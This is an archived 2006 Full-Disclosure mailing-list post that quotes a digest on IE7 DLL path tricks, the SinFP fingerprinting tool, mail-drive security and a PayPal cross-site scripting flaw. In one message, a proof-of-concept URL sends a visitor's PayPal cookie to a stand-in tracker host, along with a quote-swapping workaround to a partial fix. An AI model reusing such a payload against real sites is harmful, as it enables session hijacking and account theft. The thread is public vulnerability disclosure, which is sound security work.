Full Disclosure mailing list archives
help
From: Fig <digital.figlet () gmail com>
Date: Mon, 6 Nov 2006 13:08:59 -0500
help On 11/6/06, full-disclosure-request () lists grok org uk <full-disclosure-request () lists grok org uk> wrote:
Send Full-Disclosure mailing list submissions to full-disclosure () lists grok org uk To subscribe or unsubscribe via the World Wide Web, visit https://lists.grok.org.uk/mailman/listinfo/full-disclosure or, via email, send a message with subject or body 'help' to full-disclosure-request () lists grok org uk You can reach the person managing the list at full-disclosure-owner () lists grok org uk When replying, please edit your Subject line so it is more specific than "Re: Contents of Full-Disclosure digest..." Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you. Today's Topics: 1. Re: Internet Explorer 7 - Still Spyware Writers' Heaven (Joshua Gimer) 2. SinFP 2.04 release, works under Windows (GomoR) 3. Re: Mail Drives Security Considerations (gabriel rosenkoetter) 4. Re: alert() (Matthew Flaschen) 5. Re: Mail Drives Security Considerations (Darkz) 6. Re: Internet Explorer 7 - Still Spyware Writers' Heaven (Roger A. Grimes) ---------------------------------------------------------------------- Message: 1 Date: Sat, 4 Nov 2006 13:15:35 -0700 From: "Joshua Gimer" <jgimer () gmail com> Subject: Re: [Full-disclosure] Internet Explorer 7 - Still Spyware Writers' Heaven To: "Eliah Kagan" <degeneracypressure () gmail com> Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com Message-ID: <cf939bff0611041215u28faffd5j211562633f7a9b3d () mail gmail com> Content-Type: text/plain; charset="iso-8859-1" If Microsoft is not planning on providing a fix for this until Vista, I can see a worm coming from this. Forgive me if I don't know how this works in the windows world, but when it is looking for this DLL, does it take the first one that it finds within your path; like in UNIX? Or does it look in all directories within your path and then decide? I am guessing the former, but I am just clarifying. On 11/3/06, Eliah Kagan <degeneracypressure () gmail com> wrote:On 11/2/06, Roger A. Grimes wrote:So, if you're statement is accurate that malware would need to be placed in a directory identified by the PATH statement, we can relax because that would require Administrator access to pull off. Admin access would be needed to modify the PATH statement appropriately to include the user's desktop or some other new user writable location or Admin access would be needed to copy a file into the locations indicated by the default PATH statement.It would not require *administrator* access--non-administrator users can still add things to their own PATHs, just not to the universal, system PATH. (See Control Panel > System > Advanced > Environment Variables.) -Eliah-- Thx Joshua Gimer -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061104/b97c9d1d/attachment-0001.html ------------------------------ Message: 2 Date: Sun, 5 Nov 2006 20:02:28 +0100 From: GomoR <fd () gomor org> Subject: [Full-disclosure] SinFP 2.04 release, works under Windows To: full-disclosure () lists grok org uk Message-ID: <20061105190228.GD23011 () oshima enslaved lan> Content-Type: text/plain; charset=us-ascii Hi, I'm pleased to announce the availability of SinFP 2.04, which now can run under Windows ActivePerl. SinFP is a new approach to active and passive OS fingerprinting, you can know more about its features here: http://www.gomor.org/sinfp SinFP has now more than 130 signatures in its database. To be informed about new signature files, subscribe to: http://lists.sourceforge.net/lists/listinfo/sinfp-discuss Installation instruction can be found here: http://www.gomor.org/cgi-bin/index.pl?mode=view;page=sinfp#3 For Windows users, follow these instructions: This was tested with ActivePerl 5.8.8.819, with PPM v4.0. # If you are behind a proxy: C:\> set http_proxy=http://username:password@proxy:port # Add gomor repository C:\> ppm repo add gomor http://www.gomor.org/files/ppm/repo-8xx # Disable all other repo, if you have many. Or only ActiveState repo # by default C:\> ppm repo 1 off ... C:\> ppm install Net-SinFP # Re-enable all other repo C:\> ppm repo 1 on ... Launch it: C:\> perl C:\perl\site\bin\sinfp.pl If you have error messages about failing to load some .dll, go to www.microsoft.com. Then, in the search field, type in vcredist_x86.exe, download it and install it. Please, do not hesitate to submit new signatures to sinfp_at_gomor.org, or on the mailing list. Best regards, -- ^ ___ ___ http://www.GomoR.org/ <-+ | / __ |__/ Systems & Security Engineer | | \__/ | \ ---[ zsh$ alias psed='perl -pe ' ]--- | +--> Net::Packet <=> http://search.cpan.org/~gomor/ <--+ ------------------------------ Message: 3 Date: Sun, 5 Nov 2006 18:18:10 -0500 From: gabriel rosenkoetter <gr () eclipsed net> Subject: Re: [Full-disclosure] Mail Drives Security Considerations To: full-disclosure () lists grok org uk Message-ID: <20061105231810.GD36176 () stow eclipsed net> Content-Type: text/plain; charset="us-ascii" On Fri, Nov 03, 2006 at 11:28:27AM -0500, Matthew Flaschen wrote:Why can't message signing offer backwards compatibility (assuming you use multipart/signed)?Seems to me that adding a PGP signature verification to every operation on files (even ls(1); you have to check to make sure it's not a spoofed file) would rather noticeably impact the performance of what's already got to be pretty slow on most users' connections, and it adds a layer of complexity to the setup (you have to generate the key pair, and have the private key available on any system which you intend have write access) but that would certainly work. Spam will still be a DoS against storage space, of course. Never mind that this software violates gmail's acceptable use policy and is transmitted back and forth in the clear (unless you want to roll PGP encryption into the mix, in which case keeping paths in the clear in the subject breaks the security), so it'd be hard to view data stored this way as being "secure" to begin with... -- gabriel rosenkoetter gr () eclipsed net -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061105/669fedd5/attachment-0001.bin ------------------------------ Message: 4 Date: Sun, 05 Nov 2006 22:24:25 -0500 From: Matthew Flaschen <matthew.flaschen () gatech edu> Subject: Re: [Full-disclosure] alert() To: Matthew Flaschen <matthew.flaschen () gatech edu> Cc: full-disclosure () lists grok org uk, spoof () paypal com Message-ID: <454EAAE9.9030500 () gatech edu> Content-Type: text/plain; charset="iso-8859-1" Hmm, I got an email from Paypal, saying "Thank you for bringing this incident of suspicious activity to our attention. PayPal will investigate this activity immediately and contact you further if any additional information is required.[...]" I'm fairly certain they're referring to this exploit, which I CCed them on my previous post. Also, the POC I posted no longer works. It looks like Paypal is no longer unescaping double quotation marks. Thus, the script fails to append the cookie. At any rate, just changing the double quotes to single quotes makes the POC work again: https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:window.location='http://fooHost/tracker.php?'%2Bdocument.cookie Matt Flaschen Matthew Flaschen wrote:Good find. How about using it to steal the entire PayPal cookie, though:https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:window.location=%22http://fooHost/tracker.php?%22%2Bdocument.cookie;auto113922 () hush ai wrote:https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey- outside&voice=javascript:document.write('heh');alert('bl00p'); Concerned about your privacy? Instantly send FREE secure email, noaccount requiredhttp://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/------------------------------------------------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/-------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 250 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061105/e53d7a03/attachment-0001.bin ------------------------------ Message: 5 Date: Mon, 06 Nov 2006 10:36:10 +0200 From: Darkz <darkz.gsa () gmail com> Subject: Re: [Full-disclosure] Mail Drives Security Considerations To: Matthew Flaschen <matthew.flaschen () gatech edu>, full-disclosure () lists grok org uk Message-ID: <454EF3FA.6040409 () gmail com> Content-Type: text/plain; charset="us-ascii" An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061106/76d0ca99/attachment-0001.html ------------------------------ Message: 6 Date: Sun, 5 Nov 2006 22:35:25 -0500 From: "Roger A. Grimes" <roger () banneretcs com> Subject: Re: [Full-disclosure] Internet Explorer 7 - Still Spyware Writers' Heaven To: "Eliah Kagan" <degeneracypressure () gmail com>, <full-disclosure () lists grok org uk>, <bugtraq () securityfocus com> Message-ID: <096A04F511B7FD4995AE55F13824B8331983BB () banneretcs1 local banneretcs com> Content-Type: text/plain; charset="us-ascii" So all the malware writer has to do now is figure out how to do the initial exploit in the first place, that would then allow them to muck with path statements or place code in path executable areas. I mean, do you get it, yet? If the malware writer figures out how do the initial exploit, anything can be done, not just the path tricks. My WhereWindowsMalwareHides document(http://weblog.infoworld.com/securityadviser/archives/2006/05/up dated_where_w.html)contains over 145 different tricks and locations where malware can hide and live, along with the path trick. Your point is a valid point, but it's been a known issue for years. You can't skip over the hardest part, the initial exploit, and start picking on one of over a hundred ways to muck with Windows users and call "IE 7 a Spyware Writer's Heaven". I mean you can, but it looks like you're grasping at straws. At least tell us something new, and not something that's been documented for years. Roger -----Original Message----- From: Eliah Kagan [mailto:degeneracypressure () gmail com] Sent: Friday, November 03, 2006 9:26 PM To: full-disclosure () lists grok org uk; bugtraq () securityfocus com Subject: Re: Internet Explorer 7 - Still Spyware Writers' Heaven On 11/2/06, Roger A. Grimes wrote:So, if you're statement is accurate that malware would need to be placed in a directory identified by the PATH statement, we can relax because that would require Administrator access to pull off. Admin access would be needed to modify the PATH statement appropriately to include the user's desktop or some other new user writable location orAdmin access would be needed to copy a file into the locations indicated by the default PATH statement.It would not require *administrator* access--non-administrator users can still add things to their own PATHs, just not to the universal, system PATH. (See Control Panel > System > Advanced > Environment Variables.) -Eliah ------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ End of Full-Disclosure Digest, Vol 21, Issue 9 **********************************************
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- help Fig (Nov 06)